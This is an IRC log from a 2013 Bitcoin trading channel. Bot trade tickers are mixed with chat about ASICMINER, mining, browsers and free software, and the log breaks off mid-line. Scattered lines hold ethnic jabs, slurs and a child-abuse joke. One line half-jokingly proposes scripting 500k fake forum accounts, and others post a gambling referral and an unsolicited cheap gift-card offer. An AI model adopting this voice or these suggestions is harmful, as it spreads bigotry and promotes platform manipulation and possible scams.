Oct 25 01:18:00 <assbot> [HAVELOCK] [AM100] 29 @ 0.00879 = 0.2549 BTC [+] Oct 25 01:24:07 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00114799 = 0.1148 BTC [+] Oct 25 01:24:08 <assbot> [MPEX] [S.MPOE] 3957 @ 0.0008281 = 3.2768 BTC [+] {2} Oct 25 01:24:12 <nubbins`> https://blockchain.info/tx/011c3ab10f8fcf815fe19ad1f44be47da372654c861a5b338dcb35aa4d094573 Oct 25 01:24:12 <ozbot> Bitcoin Transaction 011c3ab10f8fcf815fe19ad1f44be47da372654c861a5b338dcb35aa4d094573 Oct 25 01:26:09 <assbot> [HAVELOCK] [AM100] 22 @ 0.008789 = 0.1934 BTC [-] Oct 25 01:26:51 <pankkake> I don't understand what is happening to that 50 BTC Oct 25 01:27:53 <pankkake> well it just looks like they're making small transactactions to… who knows Oct 25 01:28:11 <pankkake> ;;market sell 36000 Oct 25 01:28:13 <gribble> A market order to sell 36000 bitcoins right now would net 6002361.4522 USD and would take the last price down to 140.0000 USD, resulting in an average price of 166.7323 USD/BTC. | Data vintage: 0.0021 seconds Oct 25 01:30:19 <kakobrekla> would be interesting if they would dump it at once Oct 25 01:32:15 <assbot> [HAVELOCK] [AM100] 146 @ 0.00870304 = 1.2706 BTC [-] {2} Oct 25 01:33:51 <nubbins`> pankkake: i think that's the point Oct 25 01:34:42 <nubbins`> that's a common thing to see with huge balances, i'm more surprised the other 35k BTC are sitting still Oct 25 01:39:22 <assbot> [MPEX] [S.MPOE] 13626 @ 0.00082857 = 11.2901 BTC [+] {3} Oct 25 01:40:23 <assbot> [HAVELOCK] [AM1] 1 @ 0.95 BTC [-] Oct 25 01:43:26 <assbot> [HAVELOCK] [AM1] 4 @ 0.95 = 3.8 BTC [-] Oct 25 01:44:27 <assbot> [HAVELOCK] [AM1] 1 @ 0.965 BTC [+] Oct 25 01:45:28 <assbot> [HAVELOCK] [AM1] 5 @ 0.95 = 4.75 BTC [-] {2} Oct 25 01:47:38 <nubbins`> i wonder how many people are rebuying coins at a loss to scoop up AM shares Oct 25 01:48:09 <BigBitz> why would anyone want to scoop them up currently? Oct 25 01:48:31 <assbot> [HAVELOCK] [AM100] 50 @ 0.008788 = 0.4394 BTC [-] Oct 25 01:50:17 <Vp7771> positive rumor Oct 25 01:50:19 <Vp7771> https://bitcointalk.org/index.php?topic=99497.14540 Oct 25 01:50:21 <ozbot> ASICMINER: Entering the Future of ASIC Mining by Inventing It Oct 25 01:50:46 <Vp7771> comment from realdos Oct 25 01:52:43 <BigBitz> hmm. Oct 25 01:52:45 <BigBitz> interesting. Oct 25 01:53:16 <dexX7> this is her thread https://bitcointalk.org/index.php?topic=252469.0 Oct 25 01:53:30 <dexX7> it has several pages, must be legit Oct 25 01:54:05 <mircea_popescu> o look, azn ppl Oct 25 01:54:45 <Vp7771> and they look happy Oct 25 01:54:49 <Vp7771> can only mean one thing Oct 25 01:54:57 <BigBitz> PROFIT? Oct 25 01:55:05 <Vp7771> for sure Oct 25 01:55:09 <Kleeck_> My summary of the thread: FAT CHINESE NERDS. Thank you for reading. Oct 25 01:55:24 <mircea_popescu> what's am by now, 1% of nethash ? under that ? Oct 25 01:55:37 <Kleeck_> Prob. Oct 25 01:55:39 <Kleeck_> Under. Oct 25 01:55:57 <mircea_popescu> well it's good that they're keeping to their promise not to 50% the network. Oct 25 01:58:06 <Kleeck_> ROFL Oct 25 01:58:08 <Kleeck_> yeah. Oct 25 01:58:11 <Kleeck_> That was a close one! Oct 25 01:59:22 <mircea_popescu> in fairness for about three weeks it was. Oct 25 01:59:46 <mircea_popescu> long long ago on a planet far far away, known only as "this spring" Oct 25 02:00:48 <dexX7> selling/franchising mining hardware is probably more profitable than deploying the miners Oct 25 02:01:38 <mircea_popescu> selling coffee brewed from miner waste heat is probably more profitable than deploying the miners too. Oct 25 02:03:42 <Vp7771> dexX7 what site is this from: Oct 25 02:03:43 <Vp7771> http://i.imgur.com/L4c3IeC.png Oct 25 02:03:53 <Vp7771> i think i used to use it but can't find it again Oct 25 02:04:00 <dexX7> www.coinflow.co Oct 25 02:04:23 <Vp7771> oh that's it. thanks man Oct 25 02:04:26 <dexX7> np Oct 25 02:06:23 <nubbins`> you could probably roast coffee with some of those gpu rigs Oct 25 02:14:50 <mircea_popescu> http://www.reddit.com/r/programming/comments/1p3ti1/you_are_bad_at_entropy/ << stanislav takes over reddit Oct 25 02:14:51 <ozbot> You are Bad at Entropy. : programming Oct 25 02:15:57 <assbot> [MPEX] [S.MPOE] 10500 @ 0.00082945 = 8.7092 BTC [+] Oct 25 02:17:59 <assbot> [HAVELOCK] [AM1] 1 @ 0.95 BTC [-] Oct 25 02:19:00 <assbot> [HAVELOCK] [AM1] 3 @ 0.95 = 2.85 BTC [-] {2} Oct 25 02:20:01 <assbot> [HAVELOCK] [AM1] 16 @ 0.9553125 = 15.285 BTC [+] {3} Oct 25 02:22:03 <assbot> [HAVELOCK] [AM100] 18 @ 0.0085 = 0.153 BTC [+] {2} Oct 25 02:24:05 <assbot> [HAVELOCK] [AM1] 8 @ 0.96137499 = 7.691 BTC [+] {2} Oct 25 02:25:06 <assbot> [HAVELOCK] [AM1] 1 @ 0.969 BTC [+] Oct 25 02:26:07 <assbot> [HAVELOCK] [AM1] 5 @ 0.9586 = 4.793 BTC [-] {2} Oct 25 02:36:17 <assbot> [HAVELOCK] [AM100] 230 @ 0.00843478 = 1.94 BTC [-] {2} Oct 25 02:43:31 <dub> http://www.hxtop.com/html/bt03/201310242750.html Oct 25 02:43:58 <dub> looks suspiciously like the floor of the 'datacenter' is made of dirt Oct 25 02:46:15 <nubbins`> rough concrete maybe Oct 25 02:46:43 <jurov> "baked cat mine field trips" google translate makes my day Oct 25 02:47:03 <nubbins`> hmm Oct 25 02:47:28 <nubbins`> maybe i can get another "grilled cat identity" t-shirt group buy on the go Oct 25 02:47:29 <assbot> [HAVELOCK] [AM100] 25 @ 0.0084999 = 0.2125 BTC [+] Oct 25 02:47:30 <assbot> [HAVELOCK] [AM1] 5 @ 0.9687998 = 4.844 BTC [+] {3} Oct 25 02:48:30 <assbot> [HAVELOCK] [AM100] 13 @ 0.0084999 = 0.1105 BTC [+] Oct 25 02:55:37 <assbot> [HAVELOCK] [HIM] 5 @ 0.07 = 0.35 BTC [-] Oct 25 03:02:44 <assbot> [HAVELOCK] [AM1] 1 @ 0.96899999 BTC [+] Oct 25 03:11:27 <nubbins`> fuck it, https://bitcointalk.org/index.php?topic=317651.0 Oct 25 03:15:05 <dexX7> from the labcoin chan: <yesminister> let's do sam noi tshirts! Oct 25 03:16:01 <nubbins`> haha Oct 25 03:17:59 <assbot> [HAVELOCK] [CBTC] 18350 @ 0.00015 = 2.7525 BTC [-] {4} Oct 25 03:19:00 <assbot> [HAVELOCK] [AM1] 5 @ 0.96831999 = 4.8416 BTC [-] {3} Oct 25 03:27:20 <pankkake> hmm Oct 25 03:27:24 <pankkake> but I only want black :/ Oct 25 03:30:21 <dub> why the range of sizes? Oct 25 03:30:33 <dub> clearly anyone wearign that is goign to be pushign 500lb Oct 25 03:31:13 <assbot> [HAVELOCK] [AM100] 25 @ 0.0078 = 0.195 BTC [-] Oct 25 03:32:25 <nubbins`> pankkake: i do have a lot of black shirts Oct 25 03:32:39 <nubbins`> dub: there's a reason why I have no XXL left Oct 25 03:33:14 <assbot> [HAVELOCK] [AM100] 85 @ 0.00728235 = 0.619 BTC [-] {3} Oct 25 03:36:17 <assbot> [HAVELOCK] [AM100] 20 @ 0.0078 = 0.156 BTC [-] Oct 25 03:37:08 <IneedBRAINS> have you guys tried the new dice game? really nice UI ~ https://ice-dice.com/en?i=10487 Oct 25 03:37:18 <assbot> [HAVELOCK] [AM1] 3 @ 0.95 = 2.85 BTC [-] Oct 25 03:41:22 <assbot> [HAVELOCK] [AM1] 7 @ 0.95 = 6.65 BTC [-] Oct 25 03:42:23 <assbot> [HAVELOCK] [AM100] 100 @ 0.0078 = 0.78 BTC [-] Oct 25 03:43:24 <assbot> [HAVELOCK] [AM1] 5 @ 0.96884 = 4.8442 BTC [+] {4} Oct 25 03:44:47 <skinnkavaj> 588 BTC buy order on BTC/LTC Smash it! We are going to the moon over here! Oct 25 03:45:09 <nubbins`> what the fuck is up with you people and the moon Oct 25 03:45:26 <assbot> [HAVELOCK] [AM100] 102 @ 0.00839215 = 0.856 BTC [+] {2} Oct 25 03:49:55 <mircea_popescu> ^ Oct 25 03:50:31 <assbot> [HAVELOCK] [AM1] 1 @ 0.9689 BTC [+] Oct 25 03:57:39 <assbot> [HAVELOCK] [AM1] 3 @ 0.96899333 = 2.907 BTC [+] {2} Oct 25 04:04:45 <assbot> [HAVELOCK] [AM100] 57 @ 0.0078 = 0.4446 BTC [-] {2} Oct 25 04:05:30 <dub> I always assumed it was a favorite catch call of one of those weird US TV finance shows where a guy screams at the camera Oct 25 04:05:46 <dub> or from bruce wagners show Oct 25 04:27:07 <assbot> [HAVELOCK] [AM100] 172 @ 0.0078 = 1.3416 BTC [-] Oct 25 04:28:08 <assbot> [MPEX] [S.MPOE] 3050 @ 0.00083025 = 2.5323 BTC [+] {2} Oct 25 04:44:24 <assbot> [HAVELOCK] [AM100] 96 @ 0.00846 = 0.8122 BTC [+] Oct 25 04:57:57 <mike_c> !jd Oct 25 04:57:57 <assbot> Just-Dice stat: 5711 BTC profit, 59.0k BTC invested, 200.51 mio bets, 4.26 mio BTC wagered Oct 25 05:03:06 <mircea_popescu> 200mn ? Oct 25 05:03:13 <mircea_popescu> o nm. 4.2mn Oct 25 05:05:45 <assbot> [HAVELOCK] [AM100] 50 @ 0.00845 = 0.4225 BTC [-] Oct 25 05:08:49 <assbot> [HAVELOCK] [AM1] 2 @ 0.96899997 = 1.938 BTC [+] {2} Oct 25 05:28:07 <assbot> [MPEX] [S.MPOE] 6300 @ 0.00082763 = 5.2141 BTC [-] Oct 25 05:34:13 <assbot> [HAVELOCK] [AM1] 2 @ 0.89000001 = 1.78 BTC [-] {2} Oct 25 05:36:15 <assbot> [HAVELOCK] [AM100] 14 @ 0.00820285 = 0.1148 BTC [-] {2} Oct 25 05:42:21 <assbot> [HAVELOCK] [AM100] 750 @ 0.00845266 = 6.3395 BTC [+] {3} Oct 25 05:43:22 <assbot> [HAVELOCK] [AM100] 215 @ 0.0084854 = 1.8244 BTC [+] {4} Oct 25 05:44:23 <assbot> [HAVELOCK] [AM100] 405 @ 0.00859987 = 3.4829 BTC [+] {2} Oct 25 05:45:24 <assbot> [HAVELOCK] [AM1] 2 @ 0.88000001 = 1.76 BTC [-] Oct 25 06:02:42 <assbot> [HAVELOCK] [AM1] 1 @ 0.955 BTC [+] Oct 25 06:03:42 <assbot> [HAVELOCK] [AM100] 15 @ 0.00876 = 0.1314 BTC [+] Oct 25 06:04:43 <assbot> [HAVELOCK] [AM1] 2 @ 0.95 = 1.9 BTC [-] Oct 25 06:05:44 <assbot> [HAVELOCK] [AM100] 200 @ 0.00877 = 1.754 BTC [+] {2} Oct 25 06:05:45 <assbot> [HAVELOCK] [AM1] 2 @ 0.95 = 1.9 BTC [-] Oct 25 06:07:46 <assbot> [HAVELOCK] [AM100] 91 @ 0.00879087 = 0.8 BTC [+] {3} Oct 25 06:08:47 <assbot> [HAVELOCK] [AM100] 14 @ 0.008811 = 0.1234 BTC [+] Oct 25 06:09:48 <assbot> [HAVELOCK] [AM100] 95 @ 0.00889994 = 0.8455 BTC [+] {2} Oct 25 06:17:50 <KRS1> hey ChaangNoi Oct 25 06:18:57 <assbot> [HAVELOCK] [AM100] 16 @ 0.0089 = 0.1424 BTC [+] Oct 25 06:19:07 <dexX7> https://bitcointalk.org/index.php?topic=99497.msg3404281#msg3404281 + https://bitcointalk.org/index.php?topic=99497.msg3406603#msg3406603 Oct 25 06:19:09 <ozbot> ASICMINER: Entering the Future of ASIC Mining by Inventing It Oct 25 06:21:04 <KRS1> any chance the chinese government will sieze everyhing chinese BTC and the difficulty will drop? Oct 25 06:21:11 <assbot> [HAVELOCK] [AM100] 106 @ 0.0089 = 0.9434 BTC [+] Oct 25 06:21:14 <dexX7> lol Oct 25 06:21:20 <dexX7> no ;) Oct 25 06:21:20 <mircea_popescu> nope. Oct 25 06:21:50 <mircea_popescu> if indeed he delivers something like 500th in two weeks am is going back to a decent 10-15% then Oct 25 06:21:55 <KRS1> oh yeah, forgot..they prefer violating human rights. Oct 25 06:22:22 <mircea_popescu> cheap mining isn't a human right. Oct 25 06:22:40 <KRS1> thus the mining shall continue Oct 25 06:23:42 <dexX7> a redditor posted this http://blog.standardcrypto.com/2013/09/17/what-does-one-exahash-look-like/ Oct 25 06:26:04 <assbot> [HAVELOCK] [AM1] 4 @ 0.91 = 3.64 BTC [-] Oct 25 06:27:42 <asciilifeform> dexX7: some people have no imagionation: Oct 25 06:27:50 <asciilifeform> an 'exahash' looks rather different Oct 25 06:28:06 <assbot> [HAVELOCK] [B] [XBOND] 200 @ 0.00114799 = 0.2296 BTC [+] Oct 25 06:28:20 <asciilifeform> say 100,000,000 consumer webcams with a little strange mixed into the network asic. Oct 25 06:28:38 <asciilifeform> happily unwrapped on christmas day and plugged in by unsuspecting (and satisfied) people. Oct 25 06:29:06 <dexX7> hehe ;) Oct 25 06:29:07 <assbot> [HAVELOCK] [AM1] 2 @ 0.88750056 = 1.775 BTC [-] {2} Oct 25 06:29:12 <asciilifeform> *imagination Oct 25 06:29:45 <asciilifeform> it could also look like a 1m by 1m cube of gallium arsenide optical logic, bathed in liquid He Oct 25 06:29:58 <asciilifeform> but the webcams are cheaper. Oct 25 06:31:13 <asciilifeform> it could also look like a beefy off-the-shelf intel box running a successful version of 'sat-coin.' Oct 25 06:31:22 <asciilifeform> (http://jheusser.github.io/2013/02/03/satcoin.html) Oct 25 06:32:06 <nubbins`> "5. FC didn't sell his AM stocks at the peak of its price. When asked in the interview why he didn't cash out, he responded that if he sold out the shares, people who bought them would make him work for them. He would like to only work for himself." Oct 25 06:32:48 <nubbins`> what a quote Oct 25 06:33:02 <dexX7> hehe yeah, i wonder when bitcoin or bitcoin mining will act as innovation driver Oct 25 06:33:12 <assbot> [HAVELOCK] [AM100] 142 @ 0.00801143 = 1.1376 BTC [-] {5} Oct 25 06:34:14 <assbot> [HAVELOCK] [AM100] 26 @ 0.00801003 = 0.2083 BTC [-] {2} Oct 25 06:35:11 <mircea_popescu> "The Hoover Dam produces 2000 MW" Oct 25 06:35:23 <mircea_popescu> people really don't understand what dams are or how they work, do they Oct 25 06:37:09 <dub> that guy is completely retarded Oct 25 06:38:17 <assbot> [HAVELOCK] [B] [XBOND] 167 @ 0.00114799 = 0.1917 BTC [+] Oct 25 06:46:25 <assbot> [HAVELOCK] [AM100] 112 @ 0.0088891 = 0.9956 BTC [+] {3} Oct 25 06:48:27 <assbot> [HAVELOCK] [AM100] 66 @ 0.00888899 = 0.5867 BTC [-] Oct 25 06:49:01 <dub> http://www.youtube.com/watch?v=vXmqauitBkM Oct 25 06:49:02 <ozbot> Outkast - SpottieOttieDopaliscious - YouTube Oct 25 06:50:29 <assbot> [HAVELOCK] [AM1] 3 @ 0.94986666 = 2.8496 BTC [+] {2} Oct 25 06:51:30 <assbot> [HAVELOCK] [AM100] 34 @ 0.00888998 = 0.3023 BTC [+] Oct 25 06:52:31 <assbot> [MPEX] [S.MPOE] 6100 @ 0.00082763 = 5.0485 BTC [-] Oct 25 06:52:54 <KRS1> good song **** BEGIN LOGGING AT Fri Oct 25 14:26:10 2013 Oct 25 14:26:54 <assbot> [MPEX] [S.MPOE] 6300 @ 0.00083038 = 5.2314 BTC [+] Oct 25 14:27:56 <assbot> [HAVELOCK] [B] [XBOND] 90 @ 0.0011303 = 0.1017 BTC [-] Oct 25 14:29:01 <kakobrekla> this been discussed? https://peercover.com Oct 25 14:31:04 <kleeck> Interesting. Oct 25 14:31:18 <mircea_popescu> blank page. Oct 25 14:31:20 <mircea_popescu> lots of js ? Oct 25 14:31:40 <kakobrekla> i think this wants to be btcjam for ripple Oct 25 14:31:46 <kakobrekla> =? Oct 25 14:31:52 <kakobrekla> or am i missing something Oct 25 14:32:00 <kakobrekla> doesnt work in O. Oct 25 14:33:16 <mircea_popescu> btcjam for ripple. the internet is getting meta. Oct 25 14:35:02 <kakobrekla> well without registering i dunno, i see 'facebook, linkedin and dwolla' also 'ripple' Oct 25 14:35:15 <kakobrekla> and 'trust' Oct 25 14:35:35 <kakobrekla> how to put these together, i dunno. Oct 25 14:40:03 <kakobrekla> no wait this is some insurance thing? Oct 25 14:44:52 <kleeck> "Peercover is the first distributed peer coverage service by the people for the people. The team at Peercover believes in economic self sustainability, pragmatism, simplicity, and above all security. Globally positioned, Peercover works to protect people of all creeds and credos. Get covered with people you trust, get covered with Peercover." Oct 25 14:44:59 <mircea_popescu> ahahaha Oct 25 14:45:05 <mircea_popescu> best in class. Oct 25 14:45:23 <mircea_popescu> so usagi lives, "decentralised". Oct 25 14:47:15 <assbot> [MPEX] [S.MPOE] 4000 @ 0.00082819 = 3.3128 BTC [-] Oct 25 14:49:17 <assbot> [HAVELOCK] [AM1] 1 @ 0.889999 BTC [+] Oct 25 14:58:10 <kakobrekla> can someone send a pm on retardtalk for me Oct 25 15:00:28 <assbot> [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 25 15:07:35 <assbot> [HAVELOCK] [AM100] 546 @ 0.00781137 = 4.265 BTC [-] {3} Oct 25 15:08:36 <assbot> [HAVELOCK] [AM1] 4 @ 0.889999 = 3.56 BTC [+] Oct 25 15:10:38 <assbot> [HAVELOCK] [NEOBEE] 101 @ 0.00189001 = 0.1909 BTC [-] Oct 25 15:11:39 <assbot> [HAVELOCK] [AM1] 1 @ 0.89 BTC [+] Oct 25 15:15:55 <mircea_popescu> write a script, make 500k accounts, age them and take over. Oct 25 15:16:13 <mircea_popescu> bitcointalk being replaced with markov chain generated noise might be an improvement. Oct 25 15:16:15 <kakobrekla> 10 years ago id do that. Oct 25 15:19:47 <assbot> [HAVELOCK] [AM100] 58 @ 0.00799999 = 0.464 BTC [+] Oct 25 15:20:48 <assbot> [HAVELOCK] [AM100] 42 @ 0.0079 = 0.3318 BTC [-] Oct 25 15:21:28 <skinnkavaj> So LTC up again Oct 25 15:21:34 <skinnkavaj> Nice hedge against a falling BTC price Oct 25 15:21:49 <assbot> [HAVELOCK] [AM100] 58 @ 0.00789999 = 0.4582 BTC [-] Oct 25 15:22:27 <mircea_popescu> what's ltc ? Oct 25 15:22:50 <assbot> [HAVELOCK] [AM100] 1150 @ 0.00789855 = 9.0833 BTC [-] {6} Oct 25 15:23:51 <assbot> [HAVELOCK] [AM100] 55 @ 0.00818181 = 0.45 BTC [+] {2} Oct 25 15:37:35 <kakobrekla> large tits collider Oct 25 15:39:27 <pankkake> now that's something I want to own Oct 25 15:40:39 <b0n1> someone interested here for buying larger amounts in gift cards for bitcoins cheaper than their actual value? Oct 25 16:23:50 <assbot> [MPEX] [S.MPOE] 200 @ 0.00082935 = 0.1659 BTC [+] Oct 25 16:25:52 <assbot> [HAVELOCK] [AM1] 1 @ 0.898 BTC [+] Oct 25 16:27:54 <assbot> [HAVELOCK] [AM1] 9 @ 0.898 = 8.082 BTC [+] Oct 25 16:28:55 <assbot> [HAVELOCK] [AM1] 6 @ 0.89999999 = 5.4 BTC [+] Oct 25 16:31:59 <assbot> [HAVELOCK] [AM1] 1 @ 0.89999999 BTC [+] Oct 25 16:32:59 <assbot> [HAVELOCK] [NEOBEE] 192 @ 0.00221998 = 0.4262 BTC [+] Oct 25 16:34:00 <assbot> [HAVELOCK] [AM100] 15 @ 0.00825 = 0.1238 BTC [-] Oct 25 16:35:01 <assbot> [HAVELOCK] [AM100] 110 @ 0.00829954 = 0.9129 BTC [+] {2} Oct 25 16:46:13 <assbot> [HAVELOCK] [AM100] 1327 @ 0.00775244 = 10.2875 BTC [-] {9} Oct 25 16:47:14 <assbot> [HAVELOCK] [AM1] 24 @ 0.75931249 = 18.2235 BTC [-] {8} Oct 25 16:50:17 <assbot> [HAVELOCK] [NEOBEE] 113 @ 0.00221997 = 0.2509 BTC [-] Oct 25 16:52:19 <assbot> [HAVELOCK] [B] [XBOND] 500 @ 0.0011303 = 0.5652 BTC [-] Oct 25 16:55:22 <assbot> [HAVELOCK] [NEOBEE] 592 @ 0.00203333 = 1.2037 BTC [-] {2} Oct 25 16:56:23 <assbot> [HAVELOCK] [NEOBEE] 479 @ 0.00202 = 0.9676 BTC [-] {3} Oct 25 16:57:24 <assbot> [HAVELOCK] [NEOBEE] 170 @ 0.00201999 = 0.3434 BTC [-] Oct 25 16:58:25 <assbot> [HAVELOCK] [AM1] 3 @ 0.79187 = 2.3756 BTC [+] {3} Oct 25 16:58:26 <assbot> [HAVELOCK] [NEOBEE] 410 @ 0.00221216 = 0.907 BTC [+] {3} Oct 25 17:01:25 <kakobrekla> http://bitcoinmoney.com/post/28048708075/brazil-bitcoin-securities Oct 25 17:01:27 <ozbot> Bitcoin Money Oct 25 17:01:52 <kakobrekla> Yesterday the acting president of CVM, the securities regulator for Brazil, signed a decision ordering the administrator of “Grupo de Investimento Bitcoin” to suspend what the regulator describes as an investment fund. Oct 25 17:04:31 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.00221997 = 0.222 BTC [+] Oct 25 17:05:32 <assbot> [HAVELOCK] [NEOBEE] 1000 @ 0.00221998 = 2.22 BTC [+] {3} Oct 25 17:06:48 <kakobrekla> CVM recognizing btc as currency cause borred. Oct 25 17:07:50 <nubbins`> hi Oct 25 17:08:36 <kakobrekla> hm that was ike in 2012 Oct 25 17:08:43 <kakobrekla> where dafuck do you live kako Oct 25 17:11:06 <mircea_popescu> lol Oct 25 17:11:11 <mircea_popescu> i wasn't going to say anything. Oct 25 17:14:13 <nubbins`> <kakobrekla> doesnt work in O. Oct 25 17:14:19 <nubbins`> opera?! Oct 25 17:14:28 <nubbins`> you're literally the second person i've ever met who uses it Oct 25 17:14:38 <nubbins`> and i spent 5 years working as a web dev Oct 25 17:15:42 <assbot> [HAVELOCK] [AM100] 117 @ 0.00789997 = 0.9243 BTC [+] {3} Oct 25 17:15:44 <kakobrekla> nubbins` theres like 5 people on this chan using it Oct 25 17:17:13 <nubbins`> :0 Oct 25 17:17:35 <nubbins`> imagine Oct 25 17:17:43 <assbot> [HAVELOCK] [NEOBEE] 66 @ 0.00221997 = 0.1465 BTC [-] Oct 25 17:18:03 <nubbins`> anyway, uh. BITCOIN DOWN! should i put all my money in a blender and turn it on? Oct 25 17:18:44 <assbot> [HAVELOCK] [NEOBEE] 392 @ 0.00214817 = 0.8421 BTC [-] {2} Oct 25 17:20:08 <pankkake> I put it all in Chinacoin Oct 25 17:20:46 <assbot> [HAVELOCK] [NEOBEE] 210 @ 0.0021915 = 0.4602 BTC [+] {2} Oct 25 17:21:33 <nubbins`> you mean you didn't follow the advice from that guy who's always bleating about ltc? Oct 25 17:22:10 <pankkake> some crazy movements though, if somehow you can predict them Oct 25 17:22:41 <mircea_popescu> ;;ticker Oct 25 17:22:42 <gribble> MtGox BTCUSD ticker | Best bid: 181.69053, Best ask: 181.70000, Bid-ask spread: 0.00947, Last trade: 181.69053, 24 hour volume: 33649.20066128, 24 hour low: 181.14902, 24 hour high: 217.90003, 24 hour vwap: 197.78800 Oct 25 17:22:51 <mircea_popescu> nubbins` yeah. make it a 3d model. Oct 25 17:23:22 <pankkake> if you use opera you hate freedom btw Oct 25 17:23:34 <nubbins`> ^ ? Oct 25 17:23:47 <pankkake> closed source Oct 25 17:23:50 <nubbins`> ah Oct 25 17:23:54 <nubbins`> lame Oct 25 17:24:22 <nubbins`> you guys ever try the W3C's browser, Amaya? Oct 25 17:24:24 <kakobrekla> did you go through the source of your browser ? Oct 25 17:24:48 <pankkake> I tried it a few years ago, can't say it was practical to use Oct 25 17:24:57 <kakobrekla> well then Oct 25 17:25:01 <kakobrekla> what good does it do you Oct 25 17:25:02 <nubbins`> kakobrekla: just because i don't vote doesn't mean i don't want the right! ;) Oct 25 17:25:48 <kakobrekla> its all an illusion Oct 25 17:26:24 <pankkake> I'd give up that right for 1 LTC. anyway I didn't read the whole linux kernel source either Oct 25 17:26:24 <pankkake> nor bitcoin's Oct 25 17:26:49 <kakobrekla> so you still trust X to do the job for you Oct 25 17:27:06 <pankkake> I trust many people in the present and future Oct 25 17:27:42 <kakobrekla> yes elephants have 4 legs usually Oct 25 17:29:00 <pankkake> by that I mean many people are currently doing it and will do it. I trust the "enough eyeballs" Oct 25 17:29:14 <nubbins`> potential logical fallacy Oct 25 17:29:53 <kakobrekla> many people also code opera Oct 25 17:30:37 <pankkake> not that many, and they are part of the same team Oct 25 17:30:46 <pankkake> perhaps they're all reptilians Oct 25 17:32:43 <nubbins`> anyway, pankkake was making an argument for free software, not against the morals of the opera dev team Oct 25 17:33:47 <pankkake> true, I even forgot. kakobrekla you sneaky snail Oct 25 17:33:54 <kakobrekla> yes sure, but that doesnt change much, just switching who you trust to do your check for you Oct 25 17:33:59 <assbot> [HAVELOCK] [NEOBEE] 82 @ 0.00222 = 0.182 BTC [+] Oct 25 17:34:00 <assbot> [MPEX] [S.MPOE] 2344 @ 0.00082605 = 1.9363 BTC [-] Oct 25 17:35:00 <assbot> [MPEX] [S.MPOE] 1156 @ 0.00082684 = 0.9558 BTC [+] Oct 25 17:35:01 <kakobrekla> since luke is doing some patches im more worried for bitcoind than opera. Oct 25 17:35:13 <nubbins`> lel Oct 25 17:36:01 <assbot> [HAVELOCK] [NEOBEE] 193 @ 0.00223994 = 0.4323 BTC [+] Oct 25 17:37:02 <assbot> [HAVELOCK] [CBTC] 2984 @ 0.00013 = 0.3879 BTC [+] Oct 25 17:38:31 <nubbins`> brb, going to pick up a vacuum table! Oct 25 17:38:36 <VanCleef> i get the feeling Father Peter use to touch him back in his alterboy days Oct 25 17:40:05 <assbot> [HAVELOCK] [NEOBEE] 1242 @ 0.00224451 = 2.7877 BTC [+] {4} Oct 25 17:41:24 <KRS-> That table must suck. Oct 25 17:42:48 <mircea_popescu> the problem with free software is that unless there's an omnipotent dictator a la torvalds, Oct 25 17:42:52 <mircea_popescu> the project goes to shirt Oct 25 17:44:15 <jurov> dunno.. firefox seems to go fine Oct 25 17:46:16 <asciilifeform> jurov: a very peculiar definition of 'going fine.' Oct 25 17:46:48 <jurov> can you elaborate? Oct 25 17:50:16 <assbot> [HAVELOCK] [NEOBEE] 288 @ 0.0020955 = 0.6035 BTC [-] {2} Oct 25 17:50:30 <asciilifeform> jurov: firefox is a turd. Oct 25 17:53:13 <jurov> i see a breakage about equally often after kernel upgrade and after ff upgrade...don't see any huge difference Oct 25 17:56:54 <nubbins`> KRS-: i see what you did there ;p Oct 25 18:02:28 <assbot> [HAVELOCK] [AM1] 2 @ 0.80000001 = 1.6 BTC [+] Oct 25 18:03:51 <nubbins`> doing a zine workshop tonight with 18 youths, should be nice and tangly Oct 25 18:11:37 <assbot> [HAVELOCK] [AM1] 1 @ 0.88958799 BTC [+] Oct 25 18:13:39 <assbot> [HAVELOCK] [AM1] 2 @ 0.88958799 = 1.7792 BTC [+] {2} Oct 25 18:13:40 <assbot> [HAVELOCK] [B] [XBOND] 97 @ 0.0011303 = 0.1096 BTC [-] Oct 25 18:14:40 <assbot> [HAVELOCK] [AM100] 69 @ 0.00789999 = 0.5451 BTC [+] {2} Oct 25 18:14:42 <nubbins`> mircea_popescu: in fact, french fries were invented in belgium Oct 25 18:15:44 <nubbins`> (I can recall a French embassy stating this fact when asked for their opinion on "freedom fries") Oct 25 18:16:09 <mircea_popescu> the point is contentious. Oct 25 18:16:14 <mircea_popescu> belgium is france anyway :D Oct 25 18:18:07 <nubbins`> next you'll be saying canada is america! Oct 25 18:18:18 <mircea_popescu> lol Oct 25 18:18:19 <nubbins`> wait, that's not funny Oct 25 18:18:23 <nubbins`> ;) Oct 25 18:18:46 <mike_c> what's zine? http://zine.pocoo.org/ ? Oct 25 18:19:17 <nubbins`> mike_c: https://www.google.ca/search?q=zine&tbm=isch Oct 25 18:19:40 <mike_c> ah Oct 25 18:19:56 <mike_c> much cooler Oct 25 18:20:00 <nubbins`> nod Oct 25 18:22:28 <nubbins`> the great thing about self-publishing is that you can be as obscene as you want, and nobody cares Oct 25 18:23:51 <mircea_popescu> sure htey do. Oct 25 18:25:05 <nubbins`> actually, maybe "nobody will stop you" is closer to the truth Oct 25 18:26:25 <nubbins`> although, the newspaper did a story on us a while back, and i sent them over some images to accompany the article. they published a full-page image of a creature with a dick and balls for a nose. Oct 25 18:26:28 <pankkake> French people agree that fries are a Belgium thing Oct 25 18:26:32 <nubbins`> so, y'know, life's full of surprises Oct 25 18:27:38 <pankkake> though true Belgian fries are quite something compared to common fries Oct 25 18:27:53 <assbot> [HAVELOCK] [CBTC] 9704 @ 0.0001492 = 1.4478 BTC [+] {3} Oct 25 18:28:54 <assbot> [HAVELOCK] [CBTC] 3534 @ 0.00015 = 0.5301 BTC [+] Oct 25 18:28:56 <nubbins`> http://imgur.com/4wvyLAz Oct 25 18:28:56 <ozbot> imgur: the simple image sharer Oct 25 18:29:00 <nubbins`> can't be bothered to rotate it Oct 25 18:36:44 <nubbins`> ;;ticker Oct 25 18:36:45 <gribble> MtGox BTCUSD ticker | Best bid: 184.00000, Best ask: 184.00001, Bid-ask spread: 0.00001, Last trade: 183.00000, 24 hour volume: 36305.25866717, 24 hour low: 176.60399, 24 hour high: 215.99985, 24 hour vwap: 194.28240 Oct 25 18:37:26 <nubbins`> ;;ticker --market all Oct 25 18:37:35 <gribble> MtGox BTCUSD last: 182.50001, vol: 36316.43058917 | Bitstamp BTCUSD last: 175.04, vol: 33227.73049279 | BTC-E 